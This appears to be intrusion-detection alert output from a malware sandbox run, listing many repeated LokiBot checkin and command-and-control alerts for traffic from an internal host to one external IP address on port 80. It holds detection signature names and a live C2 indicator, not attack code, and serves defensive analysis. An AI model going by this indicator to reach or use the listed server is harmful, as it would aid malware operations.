2024-10-25T10:20:42.080957+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:43.413726+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:44.566821+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:45.730458+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:46.935092+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:48.041946+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:49.291568+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:50.444267+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:51.603400+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:53.016672+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:54.133034+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:55.280818+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:56.431956+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:57.593283+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:59.001743+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:21:00.130045+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:01.269869+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:02.412807+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:03.549599+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:05.290132+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:06.443742+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:07.670809+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:08.796273+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:09.928770+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:11.186518+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:12.311125+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:13.646861+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:14.786667+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:15.924397+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:17.523591+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:18.678850+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:20.169405+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:21.278945+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:22.431466+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:23.917885+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:25.060705+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:26.544494+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:27.664575+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:28.795766+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:29.966249+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:31.093840+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:32.205975+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:33.334821+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:34.473111+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:35.623881+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:36.765800+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:37.890035+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:39.040400+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:40.344341+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:41.490818+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:42.628356+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:43.771661+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:44.922014+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:46.047555+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:47.209475+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:48.343222+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:49.489044+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:50.627196+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:52.356229+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:53.474653+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:54.628216+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:55.755063+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:56.895578+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:58.166256+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:59.355701+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:22:00.539507+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:02.033727+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:03.140267+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:05.410348+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:06.540301+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:07.717612+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50102	94.156.177.220	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:01.424022+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:03.047948+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:04.092936+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:05.231108+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:06.375575+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:07.485394+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:09.597188+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:10.715160+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:12.310127+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:13.452612+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:14.593029+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:15.751617+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:16.872789+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:18.205156+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:19.310464+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:21.380407+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:22.549457+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:23.684073+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:24.816660+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:25.965151+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:27.717963+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:29.863609+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:30.997406+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:32.176322+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:33.687799+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:34.810261+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:35.916782+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:37.046303+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:38.200499+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:39.822243+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:40.950583+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:42.434571+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:43.576012+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:44.753726+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:45.967783+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:47.090625+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:48.628754+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:49.450869+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:50.632516+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:52.029076+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:53.168380+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:54.305428+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:55.471024+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:56.594180+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:58.015959+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:59.156243+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:00.311298+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:01.419074+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:02.575992+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:04.300437+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:05.450685+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:06.702578+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:07.823534+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:08.970566+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:10.210497+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:11.347066+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:12.693350+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:13.812456+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:14.957762+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:16.552285+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:17.694981+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:19.204894+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:20.326057+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:21.441410+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:22.907366+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:24.073735+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:25.575978+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:26.705064+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:27.827107+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:28.952302+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:30.120093+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:31.244679+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:32.352236+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:33.496323+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:34.650472+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:35.782292+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:36.922599+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:38.071599+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:39.204843+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:40.499810+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:41.653914+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:42.775266+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:43.937769+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:45.077227+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:46.202323+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:47.377458+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:48.502508+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:49.659829+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:51.498324+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:52.518212+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:53.649173+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:54.809440+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:55.924734+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:57.172837+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:58.339192+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:59.527535+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:01.017571+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:02.183819+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:04.446102+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:05.576112+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:06.709690+0200	2021641	1	A Network Trojan was detected	192.168.2.4	50102	94.156.177.220	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:01.424022+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:03.047948+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:04.092936+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:05.231108+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:06.375575+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:07.485394+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:09.597188+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:10.715160+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:12.310127+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:13.452612+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:14.593029+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:15.751617+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:16.872789+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:18.205156+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:19.310464+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:21.380407+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:22.549457+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:23.684073+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:24.816660+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:25.965151+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:27.717963+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:29.863609+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:30.997406+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:32.176322+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:33.687799+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:34.810261+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:35.916782+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:37.046303+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:38.200499+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:39.822243+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:40.950583+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:42.434571+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:43.576012+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:44.753726+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:45.967783+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:47.090625+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:48.628754+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:49.450869+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:50.632516+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:52.029076+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:53.168380+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:54.305428+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:55.471024+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:56.594180+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:58.015959+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:59.156243+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:00.311298+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:01.419074+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:02.575992+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:04.300437+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:05.450685+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:06.702578+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:07.823534+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:08.970566+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:10.210497+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:11.347066+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:12.693350+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:13.812456+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:14.957762+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:16.552285+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:17.694981+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:19.204894+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.220	80	TCP
